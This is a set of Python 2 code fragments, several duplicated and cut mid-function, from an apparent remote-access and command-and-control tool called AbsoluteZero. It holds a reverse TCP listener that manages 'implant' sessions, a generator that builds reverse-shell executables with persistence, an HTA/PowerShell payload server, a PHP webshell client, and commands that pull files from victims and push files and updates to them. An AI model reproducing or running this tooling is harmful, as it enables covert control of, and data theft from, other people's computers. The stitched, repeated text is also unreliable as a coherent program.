def Parse(data_to_forward): try: if data_to_forward.startswith('exec '): module_and_command = data_to_forward.split(' ')[1] module = module_and_command.split('::')[0] command = module_and_command.split('::')[1] if not module.split('/')[1] in modulehelper.MODULES: print color.ReturnError('Module "%s" not found.' % module) return ebytes.EBYTES.ping_byte payload = modulehelper.GetPayload(module, command) if payload != ebytes.EBYTES.break_byte: return payload else: return ebytes.EBYTES.ping_byte else: return base64.b64encode(data_to_forward) except IndexError: print color.ReturnError( 'Module execution error "%s" : wrong module name or parameter.' % data_to_forward) return ebytes.EBYTES.ping_byte except Exception, e: print color.ReturnError('Command "%s" unrecognized (%s).' % (data_to_forward, str(e))) return ebytes.EBYTES.ping_byte
def console(): CLI.InitializeEnvironemnt() while True: try: sys.stdout.write(color.ReturnConsole('ab0')) command = raw_input('') if command.startswith('sessions '): try: if command.split(' ')[1] == "-v": print TCPhandler.Helper.ListSessions() continue _, argument, parameter = command.split(' ') if argument == "-i": TCPhandler.Helper.ImplantInteraction(int(parameter)) elif argument == "-k": TCPhandler.Helper.KillImplant(int(parameter)) print "\n" + color.ReturnError('Session Index "%s" killed => tcp://%s:%s\n' % ( str(parameter), viewbag.all_addresses[int(parameter)][0], viewbag.all_addresses[int(parameter)][1])) TCPhandler.Helper.RemoveSession(int(parameter)) else: print color.ReturnError('Invalid argument "%s"' % argument) pass except IndexError: print color.ReturnError('No sessions open at index "%s"\n' % str(parameter)) except Exception, e: print color.ReturnError('Console -> ' + str(e)) elif command == "show options": print options.ShowOptions() elif command.startswith('payloadgen'): try: payloadgen.PayloadGenerator.Generate(command) except Exception, e: print color.ReturnError(str(e))
def load(): try: if os.path.isfile(fname): print color.ReturnInfo('Loading configuration file...') counter = 0 document = ElementTree.parse(fname) for setting in document.findall('system/'): if counter == 0: viewbag.CALLBACK_IP = setting.attrib['name'] elif counter == 1: viewbag.BUFFER_SIZE = int(setting.attrib['name']) elif counter == 2: TCPhandler.Helper.InitializePorts(setting.attrib['name']) elif counter == 3: viewbag.MAX_CONN = int(setting.attrib['name']) elif counter == 4: if setting.attrib['name'] == 'True': viewbag.MESSAGE_LENGTH_SHOW = True else: viewbag.MESSAGE_LENGTH_SHOW = False elif counter == 5: viewbag.ENVIRONMENT_FOLDER = setting.attrib['name'] elif counter == 6: if setting.attrib['name'] == 'True': viewbag.NOTIFY_CONNECTION = True else: viewbag.NOTIFY_CONNECTION = False elif counter == 7: if setting.attrib['name'] == 'True': viewbag.AUTOSTART_TCP = True if not viewbag.SERVER_STATUS: if not viewbag.PORT_LIST: print color.ReturnError( 'Error: port list is empty.') elif not viewbag.CALLBACK_IP: print color.ReturnError( 'Error: callback ip is not defined.') else: print color.ReturnInfo( 'Started Reverse TCP Handler on %s:%s' % (viewbag.CALLBACK_IP, TCPhandler.Helper.GetPrintablePorts())) thread = threading.Thread( target=TCPhandler.Helper.StartTcpHandler) thread.daemon = True thread.start() viewbag.SERVER_STATUS = True time.sleep(1) else: print color.ReturnError( 'Server is already online.') else: viewbag.AUTOSTART_TCP = False counter += 1 print color.ReturnSuccess('Configuration file loaded.\n') except Exception, e: print color.ReturnError('Error parsing the configuration: %s' % str(e))
def do_GET(self): try: if self.path == '/hta': if viewbag.NOTIFY_CONNECTION: print color.ReturnGreenNotify( '[+] New agent request -> HTA payload (%s)' % self.client_address[0]) self.send_response(200) message = '' message += mshta().getPayload() self.end_headers() self.wfile.write(message) if viewbag.NOTIFY_CONNECTION: print color.ReturnGreenNotify( '[*] Powershell PAYLOAD sent (%s Bytes) -> %s' % (mshta().utf8len( mshta().getPayload()), self.client_address[0])) return elif self.path == '/' + mshta().implant_name: self.send_response(200) self.end_headers() with open(mshta().implant_path, 'rb') as file_: self.wfile.write(file_.read()) if viewbag.NOTIFY_CONNECTION: print color.ReturnGreenNotify( "[+] Agent has downloaded the payload -> %s" % mshta().implant_name) except Exception, e: print color.ReturnError("mshta.do_GET -> " + str(e))
def KillImplant(index): try: Helper.send_msg(viewbag.all_connections[index], ebytes.EBYTES.exit_byte) except socket.error as e: color.ReturnError("Can't kill session '%s' -> " + str(e)) Helper.RemoveSession(index)
def save(): print '\n' + color.ReturnInfo('Saving current system configuration...') try: viewbag_node = Element('viewbag') system_node = SubElement(viewbag_node, 'system') port_list = TCPhandler.Helper.GetPrintablePorts() SubElement(system_node, 'CALLBACK_IP', name=viewbag.CALLBACK_IP) SubElement(system_node, 'BUFFER_SIZE', name=str(viewbag.BUFFER_SIZE)) SubElement(system_node, 'PORT_LIST', name=port_list) SubElement(system_node, 'MAX_CONN', name=str(viewbag.MAX_CONN)) SubElement(system_node, 'MESSAGE_LENGTH_SHOW', name=str(viewbag.MESSAGE_LENGTH_SHOW)) SubElement(system_node, 'ENVIRONMENT_FOLDER', name=viewbag.ENVIRONMENT_FOLDER) SubElement(system_node, 'NOTIFY_CONNECTION', name=str(viewbag.NOTIFY_CONNECTION)) SubElement(system_node, 'AUTOSTART_TCP', name=str(viewbag.AUTOSTART_TCP)) output_file = open(fname, 'w') print color.ReturnInfo('Writing to "configuration.xml"...') output_file.write('<?xml version="1.0"?>') output_file.write(ElementTree.tostring(viewbag_node)) output_file.close() print color.ReturnSuccess('Saved to -> "%s"' % fname) except Exception, e: print color.ReturnError('Error saving configuration: %s' % str(e))
def StartTcpHandler(): try: for port in viewbag.PORT_LIST: ds = (viewbag.CALLBACK_IP, port) server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind(ds) server.listen(viewbag.MAX_CONN) viewbag.SERVERS.append(server) while True: readable, _, _ = select.select(viewbag.SERVERS, [], []) ready_server = readable[0] connection, address = ready_server.accept() connection.setblocking(1) implanthash = tools.GetUniqueHashFromString(address[0]) implantnow = datetime.now() viewbag.all_addresses.append(address) viewbag.all_connections.append(connection) viewbag.all_hashes.append(implanthash) viewbag.all_times.append(implantnow) viewbag.all_rport.append(ready_server.getsockname()[1]) name, os_, arch = Helper.recv_msg(connection).split(viewbag.SPL) viewbag.all_names.append(name) viewbag.all_os.append(os_) viewbag.all_arch.append(arch) implant_folder = viewbag.ENVIRONMENT_FOLDER + '\\' + address[0] + "_" + name + "\\" tools.mkdir(implant_folder) viewbag.all_folders.append(implant_folder) except Exception as e: print color.ReturnError('StartTcpHandler -> ' + str(e))
def remove(): try: print color.ReturnInfo('Removing current configuration...') os.remove(fname) print color.ReturnSuccess('Configuration removed successfully.') except Exception, e: print color.ReturnError('Error removing configuration: %s' % str(e))
def InitializePorts(ports): try: viewbag.PORT_LIST = [] for port in ports.split(','): viewbag.PORT_LIST.append(int(port)) return 'CALLBACK_PORTS => %s' % ports except Exception, e: print color.ReturnError('InitializePorts -> ' + str(e))
def writeFile(fname, body): try: f = open(fname, "w") f.write(body) f.close() return True except Exception as e: print color.ReturnError("PayloadGen.WriteFile -> " + str(e)) return False
def GetPayload(module_name, command): try: module_name = module_name.split('/')[1] if module_name in MODULES: payload = sys.modules["payloads.modules." + module_name].run(command) return base64.b64encode('exec' + '+' * 5 + payload) else: return '\x10' except Exception as e: print color.ReturnError('GetPayload -> ' + str(e)) return '\x10'
def Connect(): try: data = "?password=%s" % webshell_password command = data + "&command" checker = False url = 'http://' + webshell_ip + ':' + str( webshell_port) + '/' + webshell_page_name print '\n' + color.ReturnInfo( 'Establishing the connection with the webshell -> %s' % url) rec = urllib2.Request(url + data) response = urllib2.urlopen(rec) check = response.read() print color.ReturnInfo('Webshell is online') i = len(check) f = check.find("$.") # print f # print i #activate it when you want to customize file length size if f == 0: print color.ReturnSuccess( 'Connection succeeded -> %s' % url) + '\n' checker = True while checker: sys.stdout.write( color.ReturnImplantConsole('absoluteZero-PHP')) cmd = raw_input('') if cmd == "exit": print color.ReturnError('Php session has been closed.') break newcmd = cmd.replace(" ", "%20") rec2 = urllib2.Request(url + command + "=%s" % newcmd) # urlencode=urllib2.unquote(rec2) response = urllib2.urlopen(rec2) check2 = response.read() print("--> " + check2) else: print color.ReturnError('Invalid password.') return except Exception, e: print color.ReturnError('Error connecting to the webshell -> %s' % str(e))
def StartTcpHandler(): try: # Initialize cryptography print color.ReturnInfo( 'Setting up AES keys for encrypted connection..') crypto_aes.initKey() print color.ReturnSuccess('Ready for the encrypted communication.') # Load ports and start socket server for port in viewbag.PORT_LIST: ds = (viewbag.CALLBACK_IP, port) server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind(ds) server.listen(viewbag.MAX_CONN) viewbag.SERVERS.append(server) while True: readable, _, _ = select.select(viewbag.SERVERS, [], []) ready_server = readable[0] connection, address = ready_server.accept() connection.setblocking(1) implanthash = tools.GetUniqueHashFromString(address[0]) implantnow = datetime.now() viewbag.all_addresses.append(address) viewbag.all_connections.append(connection) viewbag.all_hashes.append(implanthash) viewbag.all_times.append(implantnow) viewbag.all_rport.append(ready_server.getsockname()[1]) # Setup encrypted connection with the new implant connection.send(base64.b64encode(crypto_aes.uniqueKey)) name, os_, arch = Helper.recv_msg(connection).split( viewbag.SPL) viewbag.all_names.append(name) viewbag.all_os.append(os_) viewbag.all_arch.append(arch) if viewbag.NOTIFY_CONNECTION: print '\n' + color.ReturnSuccess( 'New implant connected %s/%s (%s)' % (address[0], name, os_)) implant_folder = viewbag.ENVIRONMENT_FOLDER + '\\' + address[ 0] + "_" + name + "\\" tools.mkdir(implant_folder) viewbag.all_folders.append(implant_folder) except Exception as e: print color.ReturnError('StartTcpHandler -> ' + str(e))
def Generate(string_): if len(string_.split(' ')) != 8: print color.ReturnError("Error: Arguments don't match path.") print(PayloadGenerator.doPrintHelp()) else: try: sanitized = string_.split(' ') file_extension = os.path.splitext(sanitized[5])[1] if file_extension == ".exe": if os.name == "nt": while True: if os.path.exists(r"C:\Python27\Scripts\pyinstaller.exe"): print color.ReturnSuccess( "Pyinstaller validated => C:\Python27\Scripts\pyinstaller.exe") break else: print color.ReturnError("Pyinstaller not found!") print color.ReturnError( "Can't proceed with .exe standalone builder without Pyinstaller.\n") if tools.Confirm('Do you want to install "Pyinstaller" now via "pip" command?'): os.system("c:\Python27\Scripts\pip.exe install pyinstaller") else: return None else: print color.ReturnError("Can't build .exe binary from Linux platform.") return print color.ReturnInfo("Input validated, generating payload ...") if os.name == "nt": stubname = PayloadGenerator.getTempPath() + str( PayloadGenerator.getRandomNumber(80000, 90000)) + ".py" else: stubname = os.path.dirname(os.path.abspath(__file__)) + "/" + str( PayloadGenerator.getRandomNumber(80000, 90000)) + ".py" stubpath = os.path.abspath( os.path.join(os.path.abspath(os.path.join(PayloadGenerator.getStartupPath(__file__), os.pardir)), os.pardir)) + "/payloads/reverse_tcp.py" try: shutil.copyfile(stubpath, stubname) except Exception, e: print str(e) payload_body = PayloadGenerator.readFile(stubname) payload_body = payload_body.replace("self.host = '127.0.0.1'", "self.host = '%s'" % str(sanitized[1])) payload_body = payload_body.replace("self.port = 9876", "self.port = %s" % str(sanitized[2])) payload_body = payload_body.replace("self.debug = True", "self.debug = %s" % str(sanitized[3])) payload_body = payload_body.replace("self.implantName = '0x' + 'EP01'", "self.implantName = '0x' + '%s'" % str(sanitized[4])) payload_body = payload_body.replace("self.autoPersistence = False", "self.autoPersistence = %s" % str(sanitized[7])) payload_body = PayloadGenerator.AES_payload(payload_body) PayloadGenerator.writeFile(stubname, payload_body) if file_extension == ".exe": if os.name == "nt": outputfile = sanitized[5] if not ".exe" in outputfile: outputfile += ".exe" console_debug = '' hidden_imports = '--hidden-import PIL.ImageGrab ' hidden_imports += '--hidden-import psutil ' hidden_imports += '--hidden-import json ' if sanitized[3] == "False": console_debug = "--noconsole --windowed" else: console_debug = None if console_debug is None: query = "c:\Python27\Scripts\pyinstaller.exe %s --onefile %s" % (hidden_imports, stubname) else: query = "c:\Python27\Scripts\pyinstaller.exe %s --onefile %s %s" % ( hidden_imports, console_debug, stubname) subprocess.call(query) time.sleep(5) if os.path.exists( "C:\Python27\Scripts\dist\%s.exe" % PayloadGenerator.getFileNameWithoutExtension( stubname)): shutil.copyfile( "C:\Python27\Scripts\dist\%s.exe" % PayloadGenerator.getFileNameWithoutExtension( stubname), outputfile) elif os.path.exists( "C:\Python27\dist\%s.exe" % PayloadGenerator.getFileNameWithoutExtension(stubname)): shutil.copyfile( "C:\Python27\dist\%s.exe" % PayloadGenerator.getFileNameWithoutExtension(stubname), outputfile) elif os.path.exists( "C:\Python27\build\%s\%s.exe" % (PayloadGenerator.getFileNameWithoutExtension(stubname), PayloadGenerator.getFileNameWithoutExtension( stubname))): shutil.copyfile( "C:\Python27\build\%s\%s.exe" % (PayloadGenerator.getFileNameWithoutExtension(stubname), PayloadGenerator.getFileNameWithoutExtension( stubname)), outputfile) else: print color.ReturnError( "Can't move file to location, maybe pyinstaller didn't move it yet.") try: os.remove(stubname) except Exception as e: print color.ReturnError("Error removing stub file: %s" % str(e)) print color.ReturnInfo("Final output size => %s" % PayloadGenerator.getFileSize(outputfile)) print color.ReturnSuccess("DONE => %s" % outputfile) else: print color.ReturnError("Can't build .exe binary from Linux platform.") return else: shutil.copyfile(stubname, sanitized[5]) try: os.remove(stubname) except Exception as e: print color.ReturnError("Error: %s" % str(e)) time.sleep(1) if sanitized[6] == 'True': print '\nPayload: \n' + payload_body + '\n' print color.ReturnSuccess("Final payload size => %s" % PayloadGenerator.getFileSize(sanitized[5])) print color.ReturnSuccess(("DONE => %s\n" % sanitized[5])) except Exception as e: print color.ReturnError("Error: %s" % str(e))
except Exception, e: print color.ReturnError('Console -> ' + str(e)) elif command == "show options": print options.ShowOptions() elif command.startswith('payloadgen'): try: payloadgen.PayloadGenerator.Generate(command) except Exception, e: print color.ReturnError(str(e)) elif command.startswith('run '): try: _, argument = command.split(' ') if argument == "tcp": if not viewbag.SERVER_STATUS: if not viewbag.PORT_LIST: print color.ReturnError('Error: port list is empty.') elif not viewbag.CALLBACK_IP: print color.ReturnError('Error: callback ip is not defined.') else: print '' print color.ReturnInfo('Started Reverse TCP Handler on %s:%s\n' % ( viewbag.CALLBACK_IP, TCPhandler.Helper.GetPrintablePorts())) thread = threading.Thread(target=TCPhandler.Helper.StartTcpHandler) thread.daemon = True thread.start() viewbag.SERVER_STATUS = True else: print color.ReturnError('Server is already online.') else: print color.ReturnError('Unrecognized argument "%s"' % argument)
def console(): CLI.InitializeEnvironemnt() while True: try: sys.stdout.write(color.ReturnConsole('ab0')) command = raw_input('') if command != '': log.doLog('[COMMAND] ' + str(command)) if command.startswith('sessions '): try: if command.split(' ')[1] == "-v": print TCPhandler.Helper.ListSessions() continue _, argument, parameter = command.split(' ') if argument == "-i": TCPhandler.Helper.ImplantInteraction( int(parameter)) elif argument == "-k": TCPhandler.Helper.KillImplant(int(parameter)) print "\n" + color.ReturnError( 'Session Index "%s" killed => tcp://%s:%s\n' % (str(parameter), viewbag.all_addresses[int(parameter)][0], viewbag.all_addresses[int(parameter)][1])) TCPhandler.Helper.RemoveSession(int(parameter)) else: print color.ReturnError( 'Invalid argument "%s"' % argument) pass except IndexError: print color.ReturnError( 'No sessions open at index "%s"\n' % command.split(' ')[2]) except Exception, e: print color.ReturnError('Console -> ' + str(e)) elif command == "show options": print options.ShowOptions() elif command.startswith('payloadgen'): try: payloadgen.PayloadGenerator.Generate(command) except Exception, e: print color.ReturnError(str(e)) elif command == "update": try: print 'Choose the vector method to download the new version:\n\n1) Direct Link\n2) Upload from local drive\n' choose = int(raw_input('')) if choose == 1: print color.ReturnQuestion( 'Insert the direct link (be sure that the file is public accessibly): ' ) link = raw_input('') if link != '': TCPhandler.Helper.Broadcast('\x22' + viewbag.SPL + link) else: print color.ReturnError( 'Link cannot be empty.') elif choose == 2: pass else: print color.ReturnError( 'Invalid choose selection.') except Exception, e: print color.ReturnError(str(e))
class CLI: def __init__(self): pass @staticmethod def InitializeEnvironemnt(): if os.name == 'nt': bfolder = os.getenv( 'APPDATA') + '\Microsoft\Templates\AbsoluteZero' else: from os.path import expanduser bfolder = expanduser("~") + '/AbsoluteZero' tools.mkdir(bfolder) viewbag.ENVIRONMENT_FOLDER = bfolder @staticmethod def console(): CLI.InitializeEnvironemnt() while True: try: sys.stdout.write(color.ReturnConsole('ab0')) command = raw_input('') if command != '': log.doLog('[COMMAND] ' + str(command)) if command.startswith('sessions '): try: if command.split(' ')[1] == "-v": print TCPhandler.Helper.ListSessions() continue _, argument, parameter = command.split(' ') if argument == "-i": TCPhandler.Helper.ImplantInteraction( int(parameter)) elif argument == "-k": TCPhandler.Helper.KillImplant(int(parameter)) print "\n" + color.ReturnError( 'Session Index "%s" killed => tcp://%s:%s\n' % (str(parameter), viewbag.all_addresses[int(parameter)][0], viewbag.all_addresses[int(parameter)][1])) TCPhandler.Helper.RemoveSession(int(parameter)) else: print color.ReturnError( 'Invalid argument "%s"' % argument) pass except IndexError: print color.ReturnError( 'No sessions open at index "%s"\n' % command.split(' ')[2]) except Exception, e: print color.ReturnError('Console -> ' + str(e)) elif command == "show options": print options.ShowOptions() elif command.startswith('payloadgen'): try: payloadgen.PayloadGenerator.Generate(command) except Exception, e: print color.ReturnError(str(e)) elif command == "update": try: print 'Choose the vector method to download the new version:\n\n1) Direct Link\n2) Upload from local drive\n' choose = int(raw_input('')) if choose == 1: print color.ReturnQuestion( 'Insert the direct link (be sure that the file is public accessibly): ' ) link = raw_input('') if link != '': TCPhandler.Helper.Broadcast('\x22' + viewbag.SPL + link) else: print color.ReturnError( 'Link cannot be empty.') elif choose == 2: pass else: print color.ReturnError( 'Invalid choose selection.') except Exception, e: print color.ReturnError(str(e)) elif command.startswith('run '): try: _, argument = command.split(' ') if argument == "tcp": if not viewbag.SERVER_STATUS: if not viewbag.PORT_LIST: print color.ReturnError( 'Error: port list is empty.') elif not viewbag.CALLBACK_IP: print color.ReturnError( 'Error: callback ip is not defined.' ) else: print '' print color.ReturnInfo( 'Started Reverse TCP Handler on %s:%s\n' % (viewbag.CALLBACK_IP, TCPhandler.Helper. GetPrintablePorts())) thread = threading.Thread( target=TCPhandler.Helper. StartTcpHandler) thread.daemon = True thread.start() viewbag.SERVER_STATUS = True else: print color.ReturnError( 'Server is already online.') elif argument == "php": if not PHPhandler.webshell_ip: print color.ReturnError( 'Error -> PHP handler webshell_ip must not be empty.' ) continue elif not PHPhandler.webshell_port: print color.ReturnError( 'Error -> PHP handler webshell_port must not be empty.' ) continue elif not PHPhandler.webshell_password: print color.ReturnError( 'Error -> PHP handler webshell_password must not be empty.' ) continue elif not PHPhandler.webshell_page_name: print color.ReturnError( 'Error -> PHP handler webshell_page_name must not be empty.' ) continue else: PHPhandler.Connect() continue else: print color.ReturnError( 'Unrecognized argument "%s"' % argument) except Exception, e: print color.ReturnError('Console -> ' + str(e))
def InitializeIp(ip): try: viewbag.CALLBACK_IP = ip return 'CALLBACK_IP => %s' % ip except Exception, e: print color.ReturnError('InitializeIp -> ' + str(e))
print "AUTOSTART_TCP => " + parameter else: print color.ReturnError( 'Unrecognized argument "%s"' % argument) except Exception, e: print color.ReturnError('Console -> ' + str(e)) elif command.startswith('php '): try: if command.split(' ')[1] == "show": if command.split(' ')[2] == "options": print PHPhandler.ShowOptions() else: _, field, value = command.split(' ') PHPhandler.SetField(field, value) except Exception, e: print color.ReturnError('Php set error -> %s.' % str(e)) elif command.startswith('config '): try: argument = command.split(' ')[1] if argument == "save": xmllib.save() elif argument == "remove": xmllib.remove() else: print color.ReturnError( 'Unrecognized argument "%s".' % argument) except Exception, e: print color.ReturnError( 'Configuration error -> %s.' % str(e)) elif command == "modules":
class CLI: def __init__(self): pass @staticmethod def InitializeEnvironemnt(): if os.name == 'nt': bfolder = os.getenv( 'APPDATA') + '\Microsoft\Templates\AbsoluteZero' else: from os.path import expanduser bfolder = expanduser("~") + '/AbsoluteZero' tools.mkdir(bfolder) viewbag.ENVIRONMENT_FOLDER = bfolder @staticmethod def console(): CLI.InitializeEnvironemnt() while True: try: sys.stdout.write(color.ReturnConsole('ab0')) command = raw_input('') if command != '': if command.startswith('sessions '): try: if command.split(' ')[1] == "-v": print TCPhandler.Helper.ListSessions() continue _, argument, parameter = command.split(' ') if argument == "-i": TCPhandler.Helper.ImplantInteraction( int(parameter)) elif argument == "-k": TCPhandler.Helper.KillImplant(int(parameter)) print "\n" + color.ReturnError( 'Session Index "%s" killed => tcp://%s:%s\n' % (str(parameter), viewbag.all_addresses[int(parameter)][0], viewbag.all_addresses[int(parameter)][1])) TCPhandler.Helper.RemoveSession(int(parameter)) else: print color.ReturnError( 'Invalid argument "%s"' % argument) pass except IndexError: print color.ReturnError( 'No sessions open at index "%s"\n' % str(parameter)) except Exception, e: print color.ReturnError('Console -> ' + str(e)) elif command == "show options": print options.ShowOptions() elif command.startswith('payloadgen'): try: payloadgen.PayloadGenerator.Generate(command) except Exception, e: print color.ReturnError(str(e)) elif command.startswith('run '): try: _, argument = command.split(' ') if argument == "tcp": if not viewbag.SERVER_STATUS: if not viewbag.PORT_LIST: print color.ReturnError( 'Error: port list is empty.') elif not viewbag.CALLBACK_IP: print color.ReturnError( 'Error: callback ip is not defined.' ) else: print '' print color.ReturnInfo( 'Started Reverse TCP Handler on %s:%s\n' % (viewbag.CALLBACK_IP, TCPhandler.Helper. GetPrintablePorts())) thread = threading.Thread( target=TCPhandler.Helper. StartTcpHandler) thread.daemon = True thread.start() viewbag.SERVER_STATUS = True else: print color.ReturnError( 'Server is already online.') elif argument == "php": if not PHPhandler.webshell_ip: print color.ReturnError( 'Error -> PHP handler webshell_ip must not be empty.' ) continue elif not PHPhandler.webshell_port: print color.ReturnError( 'Error -> PHP handler webshell_port must not be empty.' ) continue elif not PHPhandler.webshell_password: print color.ReturnError( 'Error -> PHP handler webshell_password must not be empty.' ) continue elif not PHPhandler.webshell_page_name: print color.ReturnError( 'Error -> PHP handler webshell_page_name must not be empty.' ) continue else: PHPhandler.Connect() continue else: print color.ReturnError( 'Unrecognized argument "%s"' % argument) except Exception, e: print color.ReturnError('Console -> ' + str(e)) elif command.startswith('set '): try: _, argument, parameter = command.split(' ') if argument == "CALLBACK_IP": TCPhandler.Helper.InitializeIp(parameter) elif argument == "CALLBACK_PORTS": TCPhandler.Helper.InitializePorts(parameter) elif argument == "MAX_CONN": viewbag.MAX_CONN = int(parameter) print "MAX_CONN => " + parameter elif argument == "MESSAGE_LENGTH_SHOW": if parameter == 'True': viewbag.MESSAGE_LENGTH_SHOW = True else: viewbag.MESSAGE_LENGTH_SHOW = False print "MESSAGE_LENGTH_SHOW => " + parameter elif argument == "ENVIRONMENT_FOLDER": if tools.mkdir(parameter): viewbag.ENVIRONMENT_FOLDER = parameter print "ENVIRONMENT_FOLDER => " + parameter elif argument == "NOTIFY_CONNECTION": if parameter == 'True': viewbag.NOTIFY_CONNECTION = True else: viewbag.NOTIFY_CONNECTION = False print "NOTIFY_CONNECTION => " + parameter elif argument == "AUTOSTART_TCP": if parameter == 'True': viewbag.AUTOSTART_TCP = True else: viewbag.AUTOSTART_TCP = False print "AUTOSTART_TCP => " + parameter else: print color.ReturnError( 'Unrecognized argument "%s"' % argument) except Exception, e: print color.ReturnError('Console -> ' + str(e))
def Broadcast(string_): try: for connection in viewbag.all_connections: Helper().send_msg(string_) except Exception, e: print color.ReturnError('Broadcast error -> "%s"' % str(e))
def ImplantInteraction(index): print color.ReturnInfo( 'Deploying meta interpreter => tcp://%s:%s' % (viewbag.all_addresses[index][0], viewbag.all_addresses[index][1])) connection = viewbag.all_connections[index] print color.ReturnInfo('Pinging Backdoor ...') try: Helper.send_msg(connection, ebytes.EBYTES.ping_byte) if Helper.recv_msg( connection) == ebytes.EBYTES.command_handling_byte: print color.ReturnSuccess( 'Backdoor returned code "\\x06", success.\n') while True: sys.stdout.write( color.ReturnImplantConsole('absoluteZero')) command = raw_input('') if command == "exit": if tools.Confirm('Close the current implant session?'): Helper.send_msg(connection, ebytes.EBYTES.exit_byte) print '' print color.ReturnError( 'Meta interpreter sessions closed => tcp://%s:%s' % (viewbag.all_addresses[index][0], viewbag.all_addresses[index][1])) break else: continue elif command == "background": raise KeyboardInterrupt elif command == "uninstall": if tools.Confirm( 'Uninstall the implant from this target?'): Helper.send_msg(connection, ebytes.EBYTES.uninstall_byte) print '' print color.ReturnError( 'Meta interpreter sessions closed => tcp://%s:%s' % (viewbag.all_addresses[index][0], viewbag.all_addresses[index][1])) print color.ReturnWarning( 'Uninstalling implant => tcp://%s:%s' % (viewbag.all_addresses[index][0], viewbag.all_addresses[index][1])) if Helper.recv_msg( connection ) == ebytes.EBYTES.confirm_uninstall_byte: print color.ReturnSuccess( 'Implant uninstalled successfully.\n') break else: continue elif command == "modules": print "\n" + color.ReturnTabulate( modulehelper.ListModules(), ['Name', 'Description'], "simple") + "\n" continue elif command.startswith('download'): try: _, file_to_download, destination_folder = command.split( ' ') if not os.path.isdir(destination_folder): print color.ReturnError( "Error: folder '%s' doesn't exists." % destination_folder) continue else: if destination_folder[ -1:] == "\\" or destination_folder[ -1:] == "/": pass else: destination_folder += "\\" except ValueError: print color.ReturnError( 'Wrong arguments, Syntax: download <remote_file_path> <destination_folder_path>' ) continue Helper.send_msg( connection, base64.b64encode('download ' + file_to_download)) check = Helper.recv_msg(connection) print '' if check == ebytes.EBYTES.exit_byte: dst = destination_folder + os.path.basename( file_to_download) print color.ReturnInfo('Downloading: %s -> %s' % (file_to_download, dst)) Helper.send_msg(connection, ebytes.EBYTES.confirmation_byte) file_content = Helper.recv_msg_noenc(connection) try: if os.path.isfile(dst): os.remove(dst) f = open(dst, 'wb') f.write(file_content) f.close() print color.ReturnSuccess( 'Downloaded: %s -> %s\n' % (file_to_download, dst)) except IOError as e: print color.ReturnError( 'Download error: Permission denied for folder -> "%s"\n' % destination_folder) except Exception, e: print color.ReturnError( 'Download error: %s\n' % str(e)) continue elif check == ebytes.EBYTES.error_byte: print color.ReturnError( 'Error: file "%s" not found.\n' % file_to_download) continue elif command.startswith('upload'): try: _, file_to_upload, destination_folder = command.split( ' ') if os.path.isfile(file_to_upload): if destination_folder[ -1:] == "\\" or destination_folder[ -1:] == "/": pass else: destination_folder += "\\" Helper.send_msg( connection, base64.b64encode( 'upload ' + destination_folder + os.path.basename(file_to_upload))) check = Helper.recv_msg(connection) if check == ebytes.EBYTES.exit_byte: try: print '' print color.ReturnInfo( 'Uploading: %s -> %s' % (file_to_upload, destination_folder + os.path.basename(file_to_upload))) f = open(file_to_upload, 'rb') content = f.read() f.close() Helper.send_msg_noenc( connection, content) output_byte = Helper.recv_msg( connection) if output_byte != ebytes.EBYTES.confirmation_byte: print color.ReturnError( output_byte) else: print color.ReturnSuccess( 'Uploaded: %s -> %s\n' % (file_to_upload, destination_folder + os.path. basename(file_to_upload))) continue except Exception, e: Helper.send_msg( connection, ebytes.EBYTES.error_byte) print color.ReturnError( "Error uploading file '%s' -> %s\n" % (file_to_upload, str(e))) continue else: print color.ReturnError( 'Something wrong while uploading file "%s"\n' % file_to_upload) continue else: print color.ReturnError( "File '%s' doesn't exists.\n" % file_to_upload) continue except ValueError: print color.ReturnError( 'Wrong arguments, Syntax: upload <local_file_path> <destination_folder_path>' ) continue
def console(): CLI.InitializeEnvironemnt() while True: try: sys.stdout.write(color.ReturnConsole('ab0')) command = raw_input('') if command != '': if command.startswith('sessions '): try: if command.split(' ')[1] == "-v": print TCPhandler.Helper.ListSessions() continue _, argument, parameter = command.split(' ') if argument == "-i": TCPhandler.Helper.ImplantInteraction( int(parameter)) elif argument == "-k": TCPhandler.Helper.KillImplant(int(parameter)) print "\n" + color.ReturnError( 'Session Index "%s" killed => tcp://%s:%s\n' % (str(parameter), viewbag.all_addresses[int(parameter)][0], viewbag.all_addresses[int(parameter)][1])) TCPhandler.Helper.RemoveSession(int(parameter)) else: print color.ReturnError( 'Invalid argument "%s"' % argument) pass except IndexError: print color.ReturnError( 'No sessions open at index "%s"\n' % str(parameter)) except Exception, e: print color.ReturnError('Console -> ' + str(e)) elif command == "show options": print options.ShowOptions() elif command.startswith('payloadgen'): try: payloadgen.PayloadGenerator.Generate(command) except Exception, e: print color.ReturnError(str(e)) elif command.startswith('run '): try: _, argument = command.split(' ') if argument == "tcp": if not viewbag.SERVER_STATUS: if not viewbag.PORT_LIST: print color.ReturnError( 'Error: port list is empty.') elif not viewbag.CALLBACK_IP: print color.ReturnError( 'Error: callback ip is not defined.' ) else: print '' print color.ReturnInfo( 'Started Reverse TCP Handler on %s:%s\n' % (viewbag.CALLBACK_IP, TCPhandler.Helper. GetPrintablePorts())) thread = threading.Thread( target=TCPhandler.Helper. StartTcpHandler) thread.daemon = True thread.start() viewbag.SERVER_STATUS = True else: print color.ReturnError( 'Server is already online.') elif argument == "php": if not PHPhandler.webshell_ip: print color.ReturnError( 'Error -> PHP handler webshell_ip must not be empty.' ) continue elif not PHPhandler.webshell_port: print color.ReturnError( 'Error -> PHP handler webshell_port must not be empty.' ) continue elif not PHPhandler.webshell_password: print color.ReturnError( 'Error -> PHP handler webshell_password must not be empty.' ) continue elif not PHPhandler.webshell_page_name: print color.ReturnError( 'Error -> PHP handler webshell_page_name must not be empty.' ) continue else: PHPhandler.Connect() continue else: print color.ReturnError( 'Unrecognized argument "%s"' % argument) except Exception, e: print color.ReturnError('Console -> ' + str(e))
